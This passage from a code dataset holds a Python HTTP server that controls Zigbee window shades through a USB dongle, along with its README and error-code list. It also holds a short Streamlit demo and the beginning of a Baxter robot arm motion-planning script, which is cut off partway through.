"text": "#!/usr/bin/env python\nimport serial\nimport requests\nimport sys\nimport time\nimport os\nimport shutil\nimport urlparse\nimport eventlet\nimport ConfigParser\nfrom BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer\n\n# Config\nconfig = ConfigParser.ConfigParser()\nconfig.read('config.cfg')\nUSB_PATH = config.get('ZIGBEE', 'USB_PATH')\nSERVER_ZIGBEE_IP = config.get('ZIGBEE', 'ip')\nSERVER_ZIGBEE_PORT = config.get('ZIGBEE', 'port')\nZIGBEE_DEVICES_PATH = config.get('ZIGBEE', 'devices_path')\nZIGBEE_TMP_PATH = config.get('ZIGBEE', 'tmp_path')\nSERVER_DOMOTICZ_PROTOCOL = config.get('DOMOTICZ', 'protocol')\nSERVER_DOMOTICZ_IP = config.get('DOMOTICZ', 'ip')\nSERVER_DOMOTICZ_PORT = config.get('DOMOTICZ', 'port')\nSERVER_DOMOTICZ_GETTER = config.get('DOMOTICZ', 'getter')\n\n# Commands\nINIT = 'INIT'\nINFO = 'INFO'\nRESET = 'RESET'\nJOIN = 'JOIN'\nNETINFO = 'NETINFO'\nDISCOVER = 'DISCOVER'\nENDPOINT = 'ENDPOINT'\nIDENTIFY = 'IDENTIFY'\nMOVEUP = 'MOVEUP'\nMOVEDOWN = 'MOVEDOWN'\nMOVETO = 'MOVETO'\nSTATUS = 'STATUS'\nDIRECT = 'DIRECT'\n\n# Params\nALL = 'ALL'\nOK = 'OK'\nLEVEL = 'LEVEL'\n\n# Errors\nerrors = ConfigParser.ConfigParser()\nerrors.read('errors.cfg')\n\n# Other\nTIME_TO_SLEEP = 0.2\n\nline = \"\"\neui_dongle = \"\"\ndevice = list()\neventlet.monkey_patch()\nser = serial.Serial(USB_PATH, 19200, timeout=1)\n\n\ndef delai():\n time.sleep(TIME_TO_SLEEP)\n\n\ndef send_order(order):\n global line\n global eui_dongle\n ser.write(order)\n line = \"\"\n while OK not in line:\n delai()\n line = ser.readline()\n print_line(line)\n if \"Telegesis\" in line:\n delai()\n line = ser.readline()\n delai()\n line = ser.readline()\n eui_dongle = line\n eui_dongle = eui_dongle.replace(\"\\r\", \"\")\n eui_dongle = eui_dongle.replace(\"\\n\", \"\")\n print eui_dongle\n line = \"\"\n print '------------------------------------------'\n\n\ndef print_line(output):\n output = output.replace(\"\\r\", \"\")\n output = output.replace(\"\\n\", \"\")\n output = output.strip()\n if output != '':\n if 'ERROR:' not in output:\n print output\n else:\n print_red(output + \" - \" + errors.get('ERRORS', output.split(':')[1]))\n\n\ndef print_red(prt):\n print(\"\\033[91m{}\\033[00m\".format(prt))\n\n\ndef format_level(level):\n a = -0.0084\n b = 3.04\n c = 35\n level = level * level * a + level * b + c\n level = int(level)\n return format(level, '02X')\n\n\nclass ZigbeeServer(BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n\n path = self.path\n tmp = urlparse.urlparse(path).query\n qs = urlparse.parse_qs(tmp)\n\n if INIT in qs:\n print(\"Processing command [\" + INIT + \"]\")\n send_order(\"AT+PANSCAN\\r\")\n\n elif INFO in qs:\n print(\"Processing command [\" + INFO + \"]\")\n send_order(\"ATI\\r\")\n\n elif RESET in qs:\n print(\"Processing command [\" + RESET + \"]\")\n send_order(\"ATZ\\r\")\n\n elif JOIN in qs:\n print(\"Processing command [\" + JOIN + \"]\")\n send_order(\"AT+JN\\r\")\n\n elif NETINFO in qs:\n print(\"Processing command [\" + NETINFO + \"]\")\n send_order(\"AT+N\\r\")\n\n elif DISCOVER in qs:\n print(\"Processing command [\" + DISCOVER + \"]\")\n device_file = open(ZIGBEE_DEVICES_PATH, 'w')\n nbr_device = qs.get('DISCOVER')[0]\n i = 1\n index = 0\n ident = \"FF\"\n index_ident = 0\n while len(list(set(device))) < int(nbr_device):\n while i == 1:\n ser.write(\"AT+NTABLE:0\" + str(index) + \",\" + ident + \"\\r\")\n time.sleep(1)\n cont = 0\n i = 0\n sousindex = 0\n dline = \"\"\n while \"ACK\" not in dline:\n dline = ser.readline()\n time.sleep(1)\n print dline\n if cont == 1 and \"|\" in dline and \"RFD\" not in dline and eui_dongle not in dline:\n id = dline.split(' | ')[3]\n print id\n device.append(id)\n sousindex += 1\n\n if \"EUI\" in dline:\n cont = 1\n if \"2.\" in dline or \"5.\" in dline or \"8.\" in dline:\n i = 1\n print \"detection 2 5 8\"\n index += 3\n print \"Changement de device: \" + str(index_ident)\n ident = device[index_ident]\n index_ident += 1\n i = 1\n index = 0\n for i in list(set(device)):\n print i\n device_file.write(i + \"\\n\")\n device_file.close()\n\n elif ENDPOINT in qs:\n print(\"Processing command [\" + ENDPOINT + \"]\")\n send_order(\"ATI\\r\")\n oldfile = open(ZIGBEE_DEVICES_PATH, 'r+')\n newfile = open(ZIGBEE_TMP_PATH, 'w')\n for dligne in oldfile:\n dligne = dligne.replace(\"\\r\", \"\")\n dligne = dligne.replace(\"\\n\", \"\")\n ser.write(\"AT+ACTEPDESC:\" + dligne + \",\" + dligne + \"\\r\")\n time.sleep(1)\n dligne = \"\"\n while \"ACK\" not in dligne:\n dligne = ser.readline()\n print dligne\n time.sleep(1)\n if \"ActEpDesc\" in dligne:\n ep = dligne.split(',')[2]\n ep = ep.replace(\"\\r\", \"\")\n ep = ep.replace(\"\\n\", \"\")\n newfile.write(dligne.replace(dligne, dligne + \"|\" + ep + \"\\n\"))\n dligne = \"\"\n oldfile.close()\n newfile.close()\n os.remove(ZIGBEE_DEVICES_PATH)\n shutil.move(ZIGBEE_TMP_PATH, ZIGBEE_DEVICES_PATH)\n\n elif IDENTIFY in qs:\n print(\"Processing command [\" + IDENTIFY + \"]\")\n send_order(\"ATI\\r\")\n oldfile = open(ZIGBEE_DEVICES_PATH, 'r+')\n newfile = open(ZIGBEE_TMP_PATH, 'w')\n for ligne in oldfile:\n ligne = ligne.replace(\"\\r\", \"\")\n ligne = ligne.replace(\"\\n\", \"\")\n input_var = raw_input(\"delai() d'attente pour volet \" + ligne.split('|')[0] + \" en secondes? \")\n time.sleep(int(input_var))\n ser.write(\"AT+IDENTIFY:\" + ligne.split('|')[0] + \",\" + ligne.split('|')[1] + \",0,000A\\r\")\n time.sleep(1)\n dline = \"\"\n while OK not in dline:\n dline = ser.readline()\n print dline\n time.sleep(1)\n input_var = raw_input(\"Nom pour ce volet: \")\n newfile.write(ligne.replace(ligne, ligne + \"|\" + input_var + \"\\n\"))\n oldfile.close()\n newfile.close()\n\n elif MOVEUP in qs:\n print(\"Processing command [\" + MOVEUP + \"]\")\n if qs.get('MOVEUP')[0] != ALL:\n device_text = qs.get('MOVEUP')[0]\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n if device_text == dline.split('|')[2]:\n ser.write(\"AT+LCMV:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,1,00,FF\\r\")\n receive = \"\"\n delai()\n while \"DFTREP\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[4] != \"00\":\n print \"Transmit KO to \" + dline.split('|')[2] + \"\\n\"\n else:\n print \"Transmit OK to \" + dline.split('|')[2] + \"\\n\"\n\n else:\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n ser.write(\"AT+LCMV:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,1,00,FF\\r\")\n receive = \"\"\n delai()\n while \"DFTREP\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[4] != \"00\":\n print \"Transmit KO to \" + dline.split('|')[2] + \"\\n\"\n else:\n print \"Transmit OK to \" + dline.split('|')[2] + \"\\n\"\n\n elif MOVEDOWN in qs:\n print(\"Processing command [\" + MOVEDOWN + \"]\")\n if qs.get('MOVEDOWN')[0] != ALL:\n device_text = qs.get(MOVEDOWN)[0]\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n if device_text == dline.split('|')[2]:\n ser.write(\"AT+LCMV:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,1,01,FF\\r\")\n receive = \"\"\n delai()\n while \"DFTREP\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[4] != \"00\":\n print \"Transmit KO to \" + dline.split('|')[2] + \"\\n\"\n else:\n print \"Transmit OK to \" + dline.split('|')[2] + \"\\n\"\n\n else:\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n ser.write(\"AT+RONOFF:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,0\\r\")\n ser.write(\"AT+LCMV:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,1,01,FF\\r\")\n receive = \"\"\n delai()\n while \"DFTREP\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[4] != \"00\":\n print \"Transmit KO to \" + dline.split('|')[2] + \"\\n\"\n else:\n print \"Transmit OK to \" + dline.split('|')[2] + \"\\n\"\n\n elif MOVETO in qs:\n print(\"Processing command [\" + MOVETO + \"]\")\n if qs.get(MOVETO)[0] != ALL:\n level = format_level(int(qs.get(LEVEL)[0]))\n device_text = qs.get(MOVETO)[0]\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n if device_text == dline.split('|')[2]:\n ser.write(\"AT+LCMVTOLEV:\" + dline.split('|')[0] + \",\" + dline.split('|')[\n 1] + \",0,0,\" + level + \",000F\\r\")\n receive = \"\"\n delai()\n while \"DFTREP\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[4] != \"00\":\n print \"Transmit KO to \" + dline.split('|')[2] + \"\\n\"\n else:\n print \"Transmit OK to \" + dline.split('|')[2] + \"\\n\"\n\n else:\n level = format_level(int(qs.get(LEVEL)[0]))\n\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n ser.write(\"AT+LCMVTOLEV:\" + dline.split('|')[0] + \",\" + dline.split('|')[\n 1] + \",0,0,\" + level + \",000F\\r\")\n receive = \"\"\n while \"DFTREP\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[4] != \"00\":\n print \"Transmit KO to \" + dline.split('|')[2] + \"\\n\"\n else:\n print \"Transmit OK to \" + dline.split('|')[2] + \"\\n\"\n\n elif STATUS in qs:\n print(\"Processing command [\" + STATUS + \"]\")\n a = 0.00081872\n b = 0.2171167\n c = -8.60201639\n if qs.get(STATUS)[0] == ALL:\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n with eventlet.Timeout(10, False):\n dline = dline.rstrip()\n delai()\n print dline\n ser.write(\n \"AT+READATR:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,0008,0000\\r\")\n receive = \"\"\n print \"1 \" + dline.split('|')[2]\n while OK not in receive:\n receive = ser.readline()\n print receive\n delai()\n\n while (\"RESPATTR\" and dline.split('|')[0]) not in receive:\n receive = ser.readline()\n print receive\n delai()\n print \"2 \" + receive\n receive = receive.rstrip()\n level = int(receive.split(',')[5], 16)\n print level\n level = int(level * level * a + level * b + c)\n if level < 0:\n level = 0\n print dline.split('|')[2] + \" est au niveau \" + str(level) + \" \\n\"\n level = int(level * 32 / 100)\n\n url = SERVER_DOMOTICZ_PROTOCOL + \"://\" + SERVER_DOMOTICZ_IP + \":\" + SERVER_DOMOTICZ_PORT + SERVER_DOMOTICZ_GETTER\n idx = dline.split('|')[3]\n\n if level == 0:\n request = url + \"&idx=\" + idx + \"&nvalue=1\"\n elif level > 31:\n request = url + \"&idx=\" + idx + \"&nvalue=0\"\n else:\n request = url + \"&idx=\" + idx + \"&nvalue=16&svalue=\" + str(level)\n print request\n requests.get(request)\n print \"Suivant\\n\"\n else:\n print \"Un seul Status\\n\"\n device_text = qs.get(STATUS)[0]\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n if device_text == dline.split('|')[2]:\n ser.write(\n \"AT+READATR:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,0006,0000\\r\")\n receive = \"\"\n while \"RESPATTR\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[5] != \"00\":\n print dline.split('|')[2] + \" est ouvert. Niveau: \"\n else:\n print dline.split('|')[2] + \" est ferme. Niveau: \"\n ser.write(\n \"AT+READATR:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,0008,0000\\r\")\n receive = \"\"\n delai()\n while \"RESPATTR\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n level = int(receive.split(',')[5], 16)\n level = int(level * level * a + level * b + c)\n print str(level) + \" \\n\"\n if level < 0:\n level = 0\n level = int(level * 32 / 100)\n level = 32 - level\n\n elif DIRECT in qs:\n print(\"Processing command [DIRECT]\")\n send_order(\"ATI\\r\")\n ser.write(qs.get(DIRECT)[0] + \"\\r\")\n time.sleep(1)\n while 1:\n dline = ser.readline()\n print dline\n\n else:\n print(\"Unrecognized command\")\n print '------------------------------------------'\n\n return\n\n\nif __name__ == \"__main__\":\n try:\n send_order(\"ATI\\r\")\n server = HTTPServer((SERVER_ZIGBEE_IP, int(SERVER_ZIGBEE_PORT)), ZigbeeServer)\n print(\"Started Zigbee HTTP server - \" + time.asctime())\n server.serve_forever()\n except KeyboardInterrupt:\n print('Shutting down Zigbee HTTP server')\n print(\"Shutting down Zigbee HTTP server - \" + time.asctime())\n server.socket.close()\n ser.close()\n sys.exit()\n"
},
{
"alpha_fraction": 0.7229390740394592,
"alphanum_fraction": 0.7623655796051025,
"avg_line_length": 28.680850982666016,
"blob_id": "c521be59029d2a9bb7ed661b57cb5e1ab625b7d9",
"content_id": "69e74cc616f9b9129803ad73b34b6c66988dd54f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2792,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 94,
"path": "/README.md",
"repo_name": "hakaesbe/zigbee_server.py",
"src_encoding": "UTF-8",
"text": "# zigbee_server.py\nWeb server to manage zigbee shades\nThis program is provided \"as is\" and has been developped to work with Telegesis Zigbee USB Dongle (ETRX357 USB) using a CICIE Home Automation firmware connected to a Raspberry Pi.\nIt has been coded to work with Domoticz but can be easily adapted to work with other system: the program act itself as a web server listening for command on port 1234\n\n## REQUIREMENTS\n\n* Python 2.7\n\nThe list of dependencies are listed in `./requirements.txt` \n\n## INSTALL\n\nFirst install the required packages:\n\n`pip install -r requirements.txt`\n\nYou can then adapt config.cfg with your server configuration.\n\n# Supported command\n* INIT\n* INFO\n* RESET\n* JOIN\n* NETINFO\n* DISCOVER\n* ENDPOINT\n* IDENTIFY\n* MOVEUP\n* MOVEDOWN\n* MOVETO\n* STATUS\n* DIRECT\n\n# Error code from https://www.silabs.com\n* 00 Everything OK - Success\n* 01 Couldn’t poll Parent because of Timeout\n* 02 Unknown command\n* 04 Invalid S-Register\n* 05 Invalid parameter\n* 06 Recipient could not be reached\n* 07 Message was not acknowledged\n* 08 No sink known\n* 09 Address Table entry is in use and cannot be modified\n* 0A Message could not be sent\n* 0B Local node is not sink\n* 0C Too many characters\n* 0E Background Scan in Progress (Please wait and try again)\n* 0F Fatal error initialising the network\n* 10 Error bootloading\n* 12 Fatal error initialising the stack\n* 18 Node has run out of Buffers\n* 19 Trying to write read-only register\n* 1A Data Mode Refused by Remote Node\n* 1B Connection Lost in Data Mode\n* 1C Remote node is already in Data Mode\n* 20 Invalid password\n* 25 Cannot form network\n* 27 No network found\n* 28 Operation cannot be completed if node is part of a PAN\n* 2C Error leaving the PAN\n* 2D Error scanning for PANs\n* 33 No response from the remote bootloader\n* 34 Target did not respond during cloning\n* 35 Timeout occurred during xCASTB\n* 39 MAC Transmit Queue is Full\n* 6C Invalid Binding Index\n* 70 Invalid Operation\n* 72 More than 10 unicast messages were in flight at the same time\n* 74 Message too long\n* 80 ZDP Invalid Request Type\n* 81 ZDP Device not Found\n* 82 ZDP Invalid Endpoint\n* 83 ZDP Not Active\n* 84 ZDP Not Supported\n* 85 ZDP Timeout\n* 86 ZDP No Match\n* 87 ZDP Table Full\n* 88 ZDP No Entry\n* 89 ZDP No Descriptor\n* 91 Operation only possible if connected to a PAN\n* 93 Node is not part of a Network\n* 94 Cannot join network\n* 96 Mobile End Device Move to new Parent Failed\n* 98 Cannot join ZigBee 2006 Network as Router\n* A1 More than 8 broadcasts were sent within 8 seconds\n* AB Trying to join, but no beacons could be heard\n* AC Network key was sent in the clear when trying to join secured\n* AD Did not receive Network Key\n* AE No Link Key received\n* AF Preconfigured Key Required\n* C5 NWK Already Present\n* C7 NWK Table Full\n* C8 NWK Unknown Device\n"
}
] | 3 |
Srouek/Algo
|
https://github.com/Srouek/Algo
|
94bbbfd72031f01d09ba656a2bfb2c988fab772e
|
3f0a2444d45580260fb086f706bc9449ea11727d
|
afd684688f77d42c99e7e62450a1aaff365c55d5
|
refs/heads/main
| 2023-01-14T06:58:37.059189 | 2020-11-18T10:21:29 | 2020-11-18T10:21:29 | 301,979,309 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7198879718780518,
"alphanum_fraction": 0.7198879718780518,
"avg_line_length": 25.30769157409668,
"blob_id": "a92393f9e3546a253ca80337108f1c21f1d335ba",
"content_id": "4668c8f40da21b456786ce883fc6995d85f640a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 357,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 13,
"path": "/app.py",
"repo_name": "Srouek/Algo",
"src_encoding": "UTF-8",
"text": "import streamlit as st\r\nimport pandas as pd\r\nimport numpy as np \r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\nst.title(\"Streamlit Crash course\")\r\nst.header(\"Simple Header\")\r\nst.subheader(\"Another sub header\")\r\nst.sidebar.header(\"Example de Side Bar\")\r\nst.sidebar.text(\"Hello\")\r\nst.text(\"For a simple text\")\r\nst.markdown(\"#### A Markdown \")\r\n\r\n"
}
] | 1 |
MengyuWu/robotics
|
https://github.com/MengyuWu/robotics
|
fbdae2c29c3c39a968939026deea4f212121b171
|
41b75353b5c4302b984ecaba7f625b5cba3f73c4
|
692afff2f14175f385fa1716a439579b1183b843
|
refs/heads/master
| 2015-08-19T06:47:46.675232 | 2015-01-26T00:01:34 | 2015-01-26T00:01:34 | 29,205,379 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6012992858886719,
"alphanum_fraction": 0.6157545447349548,
"avg_line_length": 41.839759826660156,
"blob_id": "798f11e784fa31dd47eb10e98a82ae498a83b735",
"content_id": "3a5eaff0a7b5c194a9be59f47477635a2faf42b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 35558,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 830,
"path": "/Baster Robot motion planning/hw3.py",
"repo_name": "MengyuWu/robotics",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom copy import deepcopy\nimport math\nimport numpy\nimport random\nfrom threading import Thread, Lock\nimport sys\n\nimport actionlib\nimport control_msgs.msg\nimport geometry_msgs.msg\nfrom interactive_markers.interactive_marker_server import *\nfrom interactive_markers.menu_handler import *\nimport moveit_commander\nimport moveit_msgs.msg\nimport moveit_msgs.srv\nimport rospy\nimport sensor_msgs.msg\nimport tf\nimport trajectory_msgs.msg\nfrom visualization_msgs.msg import InteractiveMarkerControl\nfrom visualization_msgs.msg import Marker\n#--------------------extra credit--------------------\nimport matplotlib.pyplot as plt\nimport time\n#------------mode select------------------\nuse_RRT=False\n\ndef convert_to_message(T):\n t = geometry_msgs.msg.Pose()\n position = tf.transformations.translation_from_matrix(T)\n orientation = tf.transformations.quaternion_from_matrix(T)\n t.position.x = position[0]\n t.position.y = position[1]\n t.position.z = position[2]\n t.orientation.x = orientation[0]\n t.orientation.y = orientation[1]\n t.orientation.z = orientation[2]\n t.orientation.w = orientation[3] \n return t\n\ndef convert_from_message(msg):\n R = tf.transformations.quaternion_matrix((msg.orientation.x,\n msg.orientation.y,\n msg.orientation.z,\n msg.orientation.w))\n T = tf.transformations.translation_matrix((msg.position.x, \n msg.position.y, \n msg.position.z))\n return numpy.dot(T,R)\n\nclass RRTNode(object):\n def __init__(self):\n self.q=numpy.zeros(7)\n self.parent = None\n\nclass MoveArm(object):\n\n def __init__(self):\n print \"HW3 initializing...\"\n # Prepare the mutex for synchronization\n self.mutex = Lock()\n\n # min and max joint values are not read in Python urdf, so we must hard-code them here\n self.q_min = []\n self.q_max = []\n self.q_min.append(-1.700);self.q_max.append(1.700)\n self.q_min.append(-2.147);self.q_max.append(1.047)\n self.q_min.append(-3.054);self.q_max.append(3.054)\n self.q_min.append(-0.050);self.q_max.append(2.618)\n self.q_min.append(-3.059);self.q_max.append(3.059)\n self.q_min.append(-1.570);self.q_max.append(2.094)\n self.q_min.append(-3.059);self.q_max.append(3.059)\n\n # Subscribes to information about what the current joint values are.\n rospy.Subscriber(\"robot/joint_states\", sensor_msgs.msg.JointState, self.joint_states_callback)\n\n # Initialize variables\n self.q_current = []\n self.joint_state = sensor_msgs.msg.JointState()\n\n # Create interactive marker\n self.init_marker()\n\n # Connect to trajectory execution action\n self.trajectory_client = actionlib.SimpleActionClient('/robot/limb/left/follow_joint_trajectory', \n control_msgs.msg.FollowJointTrajectoryAction)\n self.trajectory_client.wait_for_server()\n print \"Joint trajectory client connected\"\n\n # Wait for moveit IK service\n rospy.wait_for_service(\"compute_ik\")\n self.ik_service = rospy.ServiceProxy('compute_ik', moveit_msgs.srv.GetPositionIK)\n print \"IK service ready\"\n\n # Wait for validity check service\n rospy.wait_for_service(\"check_state_validity\")\n self.state_valid_service = rospy.ServiceProxy('check_state_validity', \n moveit_msgs.srv.GetStateValidity)\n print \"State validity service ready\"\n\n # Initialize MoveIt\n self.robot = moveit_commander.RobotCommander()\n self.scene = moveit_commander.PlanningSceneInterface()\n self.group = moveit_commander.MoveGroupCommander(\"left_arm\") \n print \"MoveIt! interface ready\"\n\n # How finely to sample each joint\n self.q_sample = [0.1, 0.1, 0.2, 0.2, 0.4, 0.4, 0.4]\n self.joint_names = [\"left_s0\", \"left_s1\",\n \"left_e0\", \"left_e1\",\n \"left_w0\", \"left_w1\",\"left_w2\"]\n\n # Options\n self.subsample_trajectory = True\n self.spline_timing = True\n\n print \"Initialization done.\"\n\n\n def control_marker_feedback(self, feedback):\n pass\n\n def get_joint_val(self, joint_state, name):\n if name not in joint_state.name:\n print \"ERROR: joint name not found\"\n return 0\n i = joint_state.name.index(name)\n return joint_state.position[i]\n\n def set_joint_val(self, joint_state, q, name):\n if name not in joint_state.name:\n print \"ERROR: joint name not found\"\n i = joint_state.name.index(name)\n joint_state.position[i] = q\n\n \"\"\" Given a complete joint_state data structure, this function finds the values for \n a particular set of joints in a particular order (in our case, the left arm joints ordered\n from proximal to distal) and returns a list q[] containing just those values.\n \"\"\"\n def q_from_joint_state(self, joint_state):\n q = []\n q.append(self.get_joint_val(joint_state, \"left_s0\"))\n q.append(self.get_joint_val(joint_state, \"left_s1\"))\n q.append(self.get_joint_val(joint_state, \"left_e0\"))\n q.append(self.get_joint_val(joint_state, \"left_e1\"))\n q.append(self.get_joint_val(joint_state, \"left_w0\"))\n q.append(self.get_joint_val(joint_state, \"left_w1\"))\n q.append(self.get_joint_val(joint_state, \"left_w2\"))\n return q\n\n \"\"\" Given a list q[] of joint values and an already populated joint_state, this function assumes \n that the passed in values are for a particular set of joints in a particular order (in our case,\n the left arm joints ordered from proximal to distal) and edits the joint_state data structure to\n set the values to the ones passed in.\n \"\"\"\n def joint_state_from_q(self, joint_state, q):\n self.set_joint_val(joint_state, q[0], \"left_s0\")\n self.set_joint_val(joint_state, q[1], \"left_s1\")\n self.set_joint_val(joint_state, q[2], \"left_e0\")\n self.set_joint_val(joint_state, q[3], \"left_e1\")\n self.set_joint_val(joint_state, q[4], \"left_w0\")\n self.set_joint_val(joint_state, q[5], \"left_w1\")\n self.set_joint_val(joint_state, q[6], \"left_w2\") \n\n \"\"\" Creates simple timing information for a trajectory, where each point has velocity\n and acceleration 0 for all joints, and all segments take the same amount of time\n to execute.\n \"\"\"\n def compute_simple_timing(self, q_list, time_per_segment):\n v_list = [numpy.zeros(7) for i in range(0,len(q_list))]\n a_list = [numpy.zeros(7) for i in range(0,len(q_list))]\n t = [i*time_per_segment for i in range(0,len(q_list))]\n return v_list, a_list, t\n\n \"\"\" This function will perform IK for a given transform T of the end-effector. It returs a list q[]\n of 7 values, which are the result positions for the 7 joints of the left arm, ordered from proximal\n to distal. If no IK solution is found, it returns an empy list.\n \"\"\"\n def IK(self, T_goal):\n req = moveit_msgs.srv.GetPositionIKRequest()\n req.ik_request.group_name = \"left_arm\"\n req.ik_request.robot_state = moveit_msgs.msg.RobotState()\n req.ik_request.robot_state.joint_state = self.joint_state\n req.ik_request.avoid_collisions = True\n req.ik_request.pose_stamped = geometry_msgs.msg.PoseStamped()\n req.ik_request.pose_stamped.header.frame_id = \"base\"\n req.ik_request.pose_stamped.header.stamp = rospy.get_rostime()\n req.ik_request.pose_stamped.pose = convert_to_message(T_goal)\n req.ik_request.timeout = rospy.Duration(3.0)\n res = self.ik_service(req)\n q = []\n if res.error_code.val == res.error_code.SUCCESS:\n q = self.q_from_joint_state(res.solution.joint_state)\n return q\n\n \"\"\" This function checks if a set of joint angles q[] creates a valid state, or one that is free\n of collisions. The values in q[] are assumed to be values for the joints of the left arm, ordered\n from proximal to distal. \n \"\"\"\n def is_state_valid(self, q):\n req = moveit_msgs.srv.GetStateValidityRequest()\n req.group_name = \"left_arm\"\n current_joint_state = deepcopy(self.joint_state)\n current_joint_state.position = list(current_joint_state.position)\n self.joint_state_from_q(current_joint_state, q)\n req.robot_state = moveit_msgs.msg.RobotState()\n req.robot_state.joint_state = current_joint_state\n res = self.state_valid_service(req)\n return res.valid\n \"\"\" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n this function checks points on segment. If all the points (every 0.1) are valid, then this segment will be valid.\n ths inputs are two vectors: segment start point and segment end point.\n \"\"\"\n def is_valid_segment(self,startpoint,endpoint):\n\tsegment=endpoint-startpoint\n\tsegment_norm=numpy.linalg.norm(segment)\n\tif segment_norm<0.1:\n\t if (self.is_state_valid(startpoint)) and (self.is_state_valid(startpoint)):\n\t\treturn True\n\t else:\n\t\treturn False\n n=int(round(segment_norm/0.1))\n\tn=n+1 #make sure that the distance between every points <0.1\n\tv=segment/n #each time increase vector v\n\tfor i in range(0,n+1): # 0~n\n\t testpoint=startpoint+i*v\n\t if not (self.is_state_valid(testpoint)):\n\t\treturn False\n\treturn True\n \n \"\"\" This is the main function to be filled in for HW3.\n Parameters:\n - q_start: the start configuration for the arm\n - q_goal: the goal configuration for the arm\n - q_min and q_max: the min and max values for all the joints in the arm.\n All the above parameters are arrays. Each will have 7 elements, one for each joint in the arm.\n These values correspond to the joints of the arm ordered from proximal (closer to the body) to \n distal (further from the body). \n\n The function must return a trajectory as a tuple (q_list,v_list,a_list,t).\n If the trajectory has n points, then q_list, v_list and a_list must all have n entries. Each\n entry must be an array of size 7, specifying the position, velocity and acceleration for each joint.\n\n For example, the i-th point of the trajectory is defined by:\n - q_list[i]: an array of 7 numbers specifying position for all joints at trajectory point i\n - v_list[i]: an array of 7 numbers specifying velocity for all joints at trajectory point i\n - a_list[i]: an array of 7 numbers specifying acceleration for all joints at trajectory point i\n Note that q_list, v_list and a_list are all lists of arrays. \n For example, q_list[i][j] will be the position of the j-th joint (0<j<7) at trajectory point i \n (0 < i < n).\n\n For example, a trajectory with just 2 points, starting from all joints at position 0 and \n ending with all joints at position 1, might look like this:\n\n q_list=[ numpy.array([0, 0, 0, 0, 0, 0, 0]),\n numpy.array([1, 1, 1, 1, 1, 1, 1]) ]\n v_list=[ numpy.array([0, 0, 0, 0, 0, 0, 0]),\n numpy.array([0, 0, 0, 0, 0, 0, 0]) ]\n a_list=[ numpy.array([0, 0, 0, 0, 0, 0, 0]),\n numpy.array([0, 0, 0, 0, 0, 0, 0]) ]\n \n Note that the trajectory should always begin from the current configuration of the robot.\n Hence, the first entry in q_list should always be equal to q_start. \n\n In addition, t must be a list with n entries (where n is the number of points in the trajectory).\n For the i-th trajectory point, t[i] must specify when this point should be reached, relative to\n the start of the trajectory. As a result t[0] should always be 0. For the previous example, if we\n want the second point to be reached 10 seconds after starting the trajectory, we can use:\n\n t=[0,10]\n\n When you are done computing all of these, return them using\n\n return q_list,v_list,a_list,t\n\n In addition, you can use the function self.is_state_valid(q_test) to test if the joint positions \n in a given array q_test create a valid (collision-free) state. q_test will be expected to \n contain 7 elements, each representing a joint position, in the same order as q_start and q_goal.\n \"\"\"\n def motion_plan(self, q_start, q_goal, q_min, q_max):\n # ---------------- replace this with your code -----v4-------------\n #-----------PRM----------------------------\n if (use_RRT==False):\n\t T=60\n infinite=float(\"inf\")\n path=[]\n min_dist_from_start_goal=infinite\n\t connectstart=False\n connectgoal=False\n\t #creat a map, key(conver point to a string), value: the point\n strmap={}\n # adjmap : adjacent pointlist for each point, adjdistmap: adjacent point distance to each point\n adjmap={}\n adjdistmap={}\n\t #add start and goal in hashmaps\n\t #print \"q_start\",q_start\n\t #print 